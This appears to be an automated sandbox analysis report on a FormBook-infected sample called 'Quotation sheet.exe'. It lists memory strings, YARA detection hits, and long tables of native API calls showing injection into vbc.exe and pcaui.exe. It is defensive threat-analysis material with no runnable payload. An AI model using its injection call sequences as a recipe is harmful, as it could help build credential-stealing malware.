                      Source: pcaui.exe, 00000009.00000003.2641779596.000000000843F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: pcaui.exe, 00000009.00000002.3974069413.000000000631E000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.000000000375E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: pcaui.exe, 00000009.00000002.3974069413.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000032A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: Quotation sheet.exeString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                      Source: Quotation sheet.exeString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                      Source: Quotation sheet.exeString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Quotation sheet.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0042C893 NtClose,7_2_0042C893
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05372DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05372C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372B60 NtClose,LdrInitializeThunk,7_2_05372B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053735C0 NtCreateMutant,LdrInitializeThunk,7_2_053735C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05374650 NtSuspendThread,7_2_05374650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05374340 NtSetContextThread,7_2_05374340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372D30 NtUnmapViewOfSection,7_2_05372D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372D10 NtMapViewOfSection,7_2_05372D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372D00 NtSetInformationFile,7_2_05372D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372DB0 NtEnumerateKey,7_2_05372DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372DD0 NtDelayExecution,7_2_05372DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372C00 NtQueryInformationProcess,7_2_05372C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372C60 NtCreateKey,7_2_05372C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372CA0 NtQueryInformationToken,7_2_05372CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372CF0 NtOpenProcess,7_2_05372CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372CC0 NtQueryVirtualMemory,7_2_05372CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372F30 NtCreateSection,7_2_05372F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372F60 NtCreateProcessEx,7_2_05372F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372FB0 NtResumeThread,7_2_05372FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372FA0 NtQuerySection,7_2_05372FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372F90 NtProtectVirtualMemory,7_2_05372F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372FE0 NtCreateFile,7_2_05372FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372E30 NtWriteVirtualMemory,7_2_05372E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372EA0 NtAdjustPrivilegesToken,7_2_05372EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372E80 NtReadVirtualMemory,7_2_05372E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372EE0 NtQueueApcThread,7_2_05372EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372BA0 NtEnumerateValueKey,7_2_05372BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372B80 NtQueryInformationFile,7_2_05372B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372BF0 NtAllocateVirtualMemory,7_2_05372BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372BE0 NtQueryValueKey,7_2_05372BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372AB0 NtWaitForSingleObject,7_2_05372AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372AF0 NtWriteFile,7_2_05372AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372AD0 NtReadFile,7_2_05372AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05373010 NtOpenDirectoryObject,7_2_05373010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05373090 NtSetValueKey,7_2_05373090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05373D10 NtOpenProcessToken,7_2_05373D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05373D70 NtOpenThread,7_2_05373D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053739B0 NtGetContextThread,7_2_053739B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05004650 NtSuspendThread,LdrInitializeThunk,9_2_05004650
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05004340 NtSetContextThread,LdrInitializeThunk,9_2_05004340
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002D10 NtMapViewOfSection,LdrInitializeThunk,9_2_05002D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_05002D30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002DD0 NtDelayExecution,LdrInitializeThunk,9_2_05002DD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_05002DF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002C60 NtCreateKey,LdrInitializeThunk,9_2_05002C60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_05002C70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_05002CA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002F30 NtCreateSection,LdrInitializeThunk,9_2_05002F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002FB0 NtResumeThread,LdrInitializeThunk,9_2_05002FB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002FE0 NtCreateFile,LdrInitializeThunk,9_2_05002FE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_05002E80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002EE0 NtQueueApcThread,LdrInitializeThunk,9_2_05002EE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002B60 NtClose,LdrInitializeThunk,9_2_05002B60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_05002BA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002BE0 NtQueryValueKey,LdrInitializeThunk,9_2_05002BE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_05002BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002AD0 NtReadFile,LdrInitializeThunk,9_2_05002AD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002AF0 NtWriteFile,LdrInitializeThunk,9_2_05002AF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050035C0 NtCreateMutant,LdrInitializeThunk,9_2_050035C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050039B0 NtGetContextThread,LdrInitializeThunk,9_2_050039B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002D00 NtSetInformationFile,9_2_05002D00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002DB0 NtEnumerateKey,9_2_05002DB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002C00 NtQueryInformationProcess,9_2_05002C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002CC0 NtQueryVirtualMemory,9_2_05002CC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002CF0 NtOpenProcess,9_2_05002CF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002F60 NtCreateProcessEx,9_2_05002F60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002F90 NtProtectVirtualMemory,9_2_05002F90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002FA0 NtQuerySection,9_2_05002FA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002E30 NtWriteVirtualMemory,9_2_05002E30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002EA0 NtAdjustPrivilegesToken,9_2_05002EA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002B80 NtQueryInformationFile,9_2_05002B80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05002AB0 NtWaitForSingleObject,9_2_05002AB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05003010 NtOpenDirectoryObject,9_2_05003010
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05003090 NtSetValueKey,9_2_05003090
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05003D10 NtOpenProcessToken,9_2_05003D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05003D70 NtOpenThread,9_2_05003D70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D89630 NtReadFile,9_2_02D89630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D897D0 NtClose,9_2_02D897D0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D89720 NtDeleteFile,9_2_02D89720
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D894C0 NtCreateFile,9_2_02D894C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D89940 NtAllocateVirtualMemory,9_2_02D89940
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_059D48700_2_059D4870
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_059D3C880_2_059D3C88
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_059D3C790_2_059D3C79
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078CCE500_2_078CCE50
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C2CA00_2_078C2CA0
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C64680_2_078C6468
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C80B80_2_078C80B8
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C60300_2_078C6030
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C2C900_2_078C2C90
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C5BF80_2_078C5BF8
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_078C68A00_2_078C68A0
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094DAC700_2_094DAC70
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094D975E0_2_094D975E
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094D66500_2_094D6650
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094DA9780_2_094DA978
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094DA9880_2_094DA988
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094DAC5F0_2_094DAC5F
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094DAC100_2_094DAC10
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_094D62880_2_094D6288
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004187F37_2_004187F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004100237_2_00410023
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004011407_2_00401140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004169F37_2_004169F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004102437_2_00410243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040E2237_2_0040E223
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040E3677_2_0040E367
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040E3737_2_0040E373
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004025D07_2_004025D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00402E107_2_00402E10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0042EED37_2_0042EED3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053405357_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054005917_2_05400591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E44207_2_053E4420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F24467_2_053F2446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EE4F67_2_053EE4F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053407707_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053647507_2_05364750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533C7C07_2_0533C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535C6E07_2_0535C6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA1187_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053301007_2_05330100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C81587_2_053C8158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F41A27_2_053F41A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054001AA7_2_054001AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F81CC7_2_053F81CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D20007_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FA3527_2_053FA352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054003E67_2_054003E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E3F07_2_0534E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E02747_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C02C07_2_053C02C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DCD1F7_2_053DCD1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534AD007_2_0534AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05358DBF7_2_05358DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE07_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340C007_2_05340C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0CB57_2_053E0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330CF27_2_05330CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05360F307_2_05360F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E2F307_2_053E2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05382F287_2_05382F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4F407_2_053B4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BEFA07_2_053BEFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534CFE07_2_0534CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332FC87_2_05332FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FEE267_2_053FEE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340E597_2_05340E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05352E907_2_05352E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FCE937_2_053FCE93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FEEDB7_2_053FEEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053569627_2_05356962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053429A07_2_053429A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540A9A67_2_0540A9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534A8407_2_0534A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053428407_2_05342840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053268B87_2_053268B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E8F07_2_0536E8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FAB407_2_053FAB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F6BD77_2_053F6BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533EA807_2_0533EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F75717_2_053F7571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054095C37_2_054095C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DD5B07_2_053DD5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF43F7_2_053FF43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053314607_2_05331460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF7B07_2_053FF7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053856307_2_05385630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F16CC7_2_053F16CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540B16B7_2_0540B16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532F1727_2_0532F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537516C7_2_0537516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534B1B07_2_0534B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F70E97_2_053F70E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF0E07_2_053FF0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EF0CC7_2_053EF0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053470C07_2_053470C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F132D7_2_053F132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532D34C7_2_0532D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0538739A7_2_0538739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053452A07_2_053452A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E12ED7_2_053E12ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535B2C07_2_0535B2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F7D737_2_053F7D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F1D5A7_2_053F1D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05343D407_2_05343D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535FDC07_2_0535FDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B9C327_2_053B9C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFCF27_2_053FFCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFF097_2_053FFF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFFB17_2_053FFFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05341F927_2_05341F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05303FD27_2_05303FD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05303FD57_2_05303FD5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05349EB07_2_05349EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D59107_2_053D5910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053499507_2_05349950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535B9507_2_0535B950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AD8007_2_053AD800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053438E07_2_053438E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFB767_2_053FFB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535FB807_2_0535FB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B5BF07_2_053B5BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537DBF97_2_0537DBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B3A6C7_2_053B3A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFA497_2_053FFA49
